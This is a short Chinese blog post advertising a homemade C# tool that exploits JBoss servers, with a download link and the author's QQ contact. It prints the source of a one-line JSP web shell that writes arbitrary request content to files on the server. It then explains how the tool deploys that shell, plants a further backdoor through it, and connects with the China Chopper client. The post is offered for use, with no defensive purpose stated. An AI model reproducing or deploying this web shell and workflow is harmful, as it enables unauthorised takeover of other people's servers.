好长时间没有更新博客了

刚写的第一个版本  有bug的话 欢迎联系我QQ 87146980

 

正文:

JBoss漏洞利用小工具

c#编写

原理是自动部署一个August.war的小马

shell.jsp

<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %>

 

然后通过这个小马上传一句话马上去

 

工具截图:

1.jpg

 

第一步填入网址

然后点击初始化

2.JPG

 

再点击Getshell

3.jpg

 

成功以后会出现shell地址

这个就是我们的一句话马

4.jpg

 

直接菜刀连接

5.jpg

 

 

下载地址:

http://pan.baidu.com/s/1hqD26fq

 

 

 

 

 

版权声明:若无特殊注明,本文皆为( August )原创,转载请保留文章出处。